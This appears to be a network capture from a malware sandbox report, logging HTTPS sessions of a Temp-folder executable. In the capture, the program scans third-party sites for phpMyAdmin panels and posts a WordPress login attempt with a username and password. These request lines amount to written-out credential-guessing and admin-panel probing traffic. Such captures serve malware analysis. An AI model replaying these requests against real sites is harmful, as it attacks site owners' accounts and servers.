2023-12-22 20:15:08 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:15:09 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab
2023-12-22 20:15:09 UTC	16384	IN	Data Raw: 6f 73 73 68 61 69 72 73 22 3a 22 66 61 6c 20 66 61 2d 63 72 6f 73 73 68 61 69 72 73 22 2c 22 63 73 73 33 22 3a 22 66 61 62 20 66 61 2d 63 73 73 33 22 2c 22 63 75 62 65 73 22 3a 22 66 61 73 20 66 61 2d 63 75 62 65 73 22 2c 22 64 65 6c 69 63 69 6f 75 73 22 3a 22 66 61 62 20 66 61 2d 64 65 6c 69 63 69 6f 75 73 22 2c 22 64 65 73 6b 74 6f 70 22 3a 22 66 61 73 20 66 61 2d 64 65 73 6b 74 6f 70 22 2c 22 64 65 76 69 61 6e 74 61 72 74 22 3a 22 66 61 62 20 66 61 2d 64 65 76 69 61 6e 74 61 72 74 22 2c 22 64 6f 74 2d 63 69 72 63 6c 65 22 3a 22 66 61 72 20 66 61 2d 64 6f 74 2d 63 69 72 63 6c 65 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 66 61 73 20 66 61 2d 64 6f 77 6e 6c 6f 61 64 22 2c 22 64 72 69 62 62 62 6c 65 22 3a 22 66 61 62 20 66 61 2d 64 72 69 62 62 62 6c 65 22 Data Ascii: osshairs":"fal fa-crosshairs","css3":"fab fa-css3","cubes":"fas fa-cubes","delicious":"fab fa-delicious","desktop":"fas fa-desktop","deviantart":"fab fa-deviantart","dot-circle":"far fa-dot-circle","download":"fas fa-download","dribbble":"fab fa-dribbble"
2023-12-22 20:15:09 UTC	16384	IN	Data Raw: 22 20 64 61 74 61 2d 6c 65 76 65 6c 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 64 61 74 61 2d 63 6f 6c 6c 61 70 73 65 3d 22 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 64 61 74 61 2d 73 75 63 63 65 73 73 3d 22 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 75 6c 20 Data Ascii: " data-level="0"> <i class="fas fa-caret-right default-fasize" aria-hidden="true" data-collapse="fa-caret-right default-fasize" data-success="fa-caret-down default-fasize"></i> </a></div><ul
2023-12-22 20:15:09 UTC	12337	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 74 65 78 74 27 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 2d 74 65 78 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 62 75 74 74 6f 6e 73 27 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 Data Ascii: justify-content: flex-end; margin-top: 2em; margin-bottom: 1em; } </style> <div id="aviso-cookies"> <div class='aviso-cookie-text' id="aviso-cookies-text"> </div> <div class='aviso-cookie-buttons'> <a href="https://w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
266	192.168.2.4	52201	217.146.69.50	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	164	OUT	GET /pma/ HTTP/1.1 Host: pistik.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	259	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:08 GMT Server: Apache / ZoneOS Connection: Upgrade, close Last-Modified: Mon, 23 Oct 2023 21:31:51 GMT ETag: "1d7b-60868f3479039" Accept-Ranges: bytes Content-Length: 7547 Content-Type: text/html
2023-12-22 20:15:08 UTC	7547	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
267	192.168.2.4	52799	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	344	OUT	POST /wp-login.php HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP+Cookie+check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://saltdelcolom.com/wp-login.php Content-Length: 144 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:08 UTC	144	OUT	Data Raw: 6c 6f 67 3d 70 65 70 26 70 77 64 3d 39 25 33 46 25 33 46 30 51 25 33 46 25 33 46 25 32 31 43 6b 25 33 46 25 32 35 4e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 45 6e 74 72 61 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=pep&pwd=9%3F%3F0Q%3F%3F%21Ck%3F%25N&rememberme=forever&wp-submit=Entra&redirect_to=https%3A%2F%2Fsaltdelcolom.com%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:09 UTC	555	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:09 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:09 UTC	813	IN	Data Raw: 32 33 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 45 6e 74 72 61 20 26 6c 73 61 71 75 6f 3b 20 53 61 6c 74 20 64 65 6c 20 43 6f 6c 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: 2350<!DOCTYPE html><html lang="ca"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Entra &lsaquo; Salt del Colom — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:15:09 UTC	8235	IN	Data Raw: 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 32 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 Data Ascii: s://saltdelcolom.com/wp-admin/css/login.min.css?ver=6.2.3' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://saltdelcolom.com/wp-conte
2023-12-22 20:15:09 UTC	418	IN	Data Raw: 31 39 36 0d 0a 09 09 09 3c 73 63 72 69 70 74 3e 0d 0a 09 09 09 2f 28 74 72 69 64 65 6e 74 7c 6d 73 69 65 29 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 26 26 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 68 61 73 68 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 2f 5e 5b 41 2d 7a 30 2d 39 5f 2d 5d 2b 24 2f 2e 74 65 73 74 28 65 29 26 26 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 29 26 Data Ascii: 196<script>/(trident\|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
268	192.168.2.4	53008	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	179	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	639	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:08 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: http://www.thenile.com.au/phpMyAdmin via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q6VnCPr5gblKDVlUwl%2F4v%2FNXkU1B9oscXUGk3OR9JIlZBvJYbfotA09H%2BpgCmL0EQO7iWdlRIYw4mdyFSfbYc1js9CJ27mFcZoe8z0CyaVDi%2BAcEkb7kNpTxZGcxdxGX8G%2BZNQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08ff69f07424-MIA
2023-12-22 20:15:08 UTC	251	IN	Data Raw: 66 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 70 68 70 4d 79 41 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: f5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/phpMyAdmin">here</a>.</p></body></html>
2023-12-22 20:15:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
269	192.168.2.4	53580	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	246	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	1362	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache, s-maxage=10 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=eg5hoe9fiphpkgc7auqitf2hvp; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:09 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:09 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:09 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:09 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:09 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:09 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:09 GMT; Max-Age=0; path=/
2023-12-22 20:15:09 UTC	1261	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 70 2d 73 65 74 74 69 6e 67 73 2d 74 69 6d 65 2d 30 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 39 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 33 34 65 31 65 66 34 66 64 61 39 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 39 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 Data Ascii: Set-Cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:09 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:09 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc12
2023-12-22 20:15:09 UTC	381	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 35 45 54 67 58 72 77 63 6b 74 76 58 32 4a 42 4f 6f 4c 6b 4d 63 6f 59 64 46 63 4f 4c 4d 67 6a 44 48 52 30 68 38 52 56 25 32 46 6f 7a 43 61 31 49 65 6a 32 4d 72 64 65 25 32 42 73 72 25 32 42 4b 35 74 54 38 67 48 63 4d 46 59 32 59 64 62 7a 30 45 55 5a 42 75 25 32 46 38 42 50 76 39 4f 25 32 42 64 67 62 4d 79 4d 38 78 76 77 32 79 46 32 47 55 44 67 41 71 77 53 69 57 32 35 71 4f 5a 4e 4d 25 32 46 4d 47 62 42 38 67 42 4f 44 61 6d 74 66 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5ETgXrwcktvX2JBOoLkMcoYdFcOLMgjDHR0h8RV%2FozCa1Iej2Mrde%2Bsr%2BK5tT8gHcMFY2Ydbz0EUZBu%2F8BPv9O%2BdgbMyM8xvw2yF2GUDgAqwSiW25qOZNM%2FMGbB8gBODamtf"}],"group":"cf-nel","max_age":60
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 31 36 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 166d<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 Data Ascii: .php" method="post"><p><label for="user_login">Username or Email Address</label><input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" autocomplete="username" required="required"/></p><di
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 5f 6c 6f 67 69 6e 22 29 3b 64 2e 66 6f 63 75 73 28 29 3b 64 2e 73 65 6c 65 63 74 28 29 3b 7d 63 61 74 63 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f Data Ascii: ord?</a></p><script type="text/javascript">//<![CDATA[function wp_attempt_focus(){setTimeout(function(){try{d=document.getElementById("user_login");d.focus();d.select();}catch(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnlo
